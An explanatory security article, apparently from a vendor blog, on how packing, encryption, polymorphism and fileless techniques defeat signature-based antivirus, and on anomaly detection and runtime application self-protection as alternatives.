Signature-based detection is a commonly-used mechanism for antivirus solutions to identify known malware variants. The antivirus compares a unique fingerprint or signature of the malware to every file entering a computer or network. Any file that matches the signature is identified as malware and marked as malicious.
Unfortunately, signature-based detection is growing less and less effective. As cybercriminals use a variety of techniques to defeat it, detecting and eradicating malware infestations will require other techniques, such as anomaly detection and runtime application self-protection.
Signature AV is Increasingly Ineffective
Only 50% of malware is caught by signature-based antivirus systems. The reason for this is that malware authors are increasingly using techniques designed specifically to defeat signature detection, like code packing, encryption, polymorphism, and fileless malware.
Some malware variants will use “packing” to help conceal the identifiable code or data of the malware. A packer is designed to compress or otherwise obfuscate the malware’s contents. Once the malware is on the target machine, an “unpacking stub” (a small piece of non-obfuscated code) runs and unpacks the malicious code, allowing it to run on the infected computer.
Since a wide range of packers exists (and malware authors can write their own), many tools that try to perform static analysis of malicious code (without running it) cannot reverse the obfuscation. As a result, signatures generated based off the malware’s code will not be able to match and identify the sample.
Use of Encryption
A step up from the use of simple packing or obfuscation techniques is the use of encryption to protect malware from detection. In this case, the obfuscation algorithm used is a strong encryption algorithm, which can’t be decrypted without access to the appropriate encryption key.
Typically, encrypting something for the malware on the infected machine is of limited value since the malware needs access to the encryption key to perform decryption (meaning a forensic analyst could find and use the key as well). However, when the goal is simply to frustrate or delay detection of a malware infection, using encryption and embedding the encryption key within the malware is a good way to go about it.
While the use of packing and encryption is good for defeating signature analysis by some tools, it is not a perfect solution. Some cybersecurity solutions will execute suspicious code in a sandboxed environment, meaning that the unpacking or decrypting code will be run by the malware itself, revealing the deobfuscated code and data. At this point, traditional signature-based detection can be effective.
Polymorphic malware takes a different approach to defeating signature detection. Rather than hiding the portions of itself that could be matched by signatures, polymorphic malware ensures that no two malware samples will match the same signature.
The malware does this by transforming its own code in ways that do not impact the functionality of the malware itself. Many low-level instructions (like putting a value of zero in a certain computer register) can be performed in a variety of different ways.
While swapping two of these out in a single line of code would not impact the malware’s operation, it would cause the two versions of the malware to have a completely different file hash. Since file hashes are commonly used to identify different malware variants, this simple tweak would make hash-based signature detection algorithms completely unusable. Since polymorphic malware is so effective for defeating signature-based detection, it is unsurprising that 93% of modern malware is polymorphic.
Signature-based detection works by comparing a file containing potentially malicious code to a library of signatures of known malware variants. However, this approach is only effective if there is a file of malicious code to compare against.
Fileless malware is designed to “live off the land” by taking advantage of legitimate functionality built into the target system. Tools like Windows PowerShell are extremely powerful, and a cybercriminal can often achieve their objective simply by running a few PowerShell commands from an infected Word document.
If this is not the case, the malicious document could act as a downloader requesting malicious code protected by one of the other mechanisms described here.
Fileless malware is effective since it includes no files for signature-based detection to compare against. As a result, it is an increasingly popular technique used by malware authors.
Protecting Against Malware Threats
Signature-based detection of malware has been a popular technique for a long time since it is simple and effective. Unique features of a malware sample can be extracted either manually or automatically, and these features can be used to generate a signature to which every file entering a computer or network can be compared.
However, the simplicity of signature detection also makes it easy to circumvent. Techniques like code packing, encryption, and polymorphism make it possible for a malware sample to avoid detection based upon signatures. With fileless malware, there is no file for the signature to match.
The low effectiveness rate of signature detection (only 50%) means that alternatives are necessary to ensure the protection of endpoint devices against malware threats. Anomaly-based detection mechanisms can be effective for detecting malicious files if a file exists.
In the case of fileless malware, where the malicious program uses legitimate applications to achieve its goals, a solution like runtime application self-protection (RASP) may be necessary. RASP wraps around a program, observing its inputs, outputs, and behavior. Any abnormalities trigger a response, making even fileless malware detectable.